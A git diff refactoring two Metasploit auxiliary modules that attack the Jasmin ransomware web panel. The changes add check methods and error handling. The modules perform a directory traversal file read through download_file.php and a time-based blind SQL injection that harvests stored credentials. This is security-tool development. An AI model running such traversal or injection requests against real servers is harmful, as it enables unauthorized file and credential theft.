diff --git a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
index 72da2fa8a56ef..fa83ab4d63413 100644
--- a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
@@ -6,7 +6,6 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
@@ -47,27 +46,33 @@ def initialize(info = {})
)
end
- def run_host(ip)
+ def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path)
)
+ return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+ return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
- fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? 'Jasmin Dashboard'
+ Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard'
+ end
+ def run
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'download_file.php'),
'vars_get' => {
'file' => "#{'../' * datastore['DEPTH']}#{datastore['FILE']}"
}
)
+ fail_with(Failure::Unknown, 'No response from server') if res.nil?
fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty?
+ fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 200
print_good(res.body)
# store loot
path = store_loot(
'jasmin.webpanel.dir.traversal',
'text/plain',
- ip,
+ datastore['rhost'],
res.body,
File.basename(datastore['FILE'])
)
diff --git a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
index 39b6c738440f6..109038377f217 100644
--- a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
- include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
@@ -49,13 +48,17 @@ def initialize(info = {})
)
end
- def run_host(ip)
+ def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path)
)
+ return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+ return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
- fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? 'Jasmin Dashboard'
+ Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard'
+ end
+ def run
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
check_char = Rex::Text.rand_text_alpha_lower(5)
res = send_request_cgi({
@@ -88,7 +91,7 @@ def run_host(ip)
private_type: :password,
private_data: user[1],
service_name: 'Jasmin Webpanel',
- address: ip,
+ address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED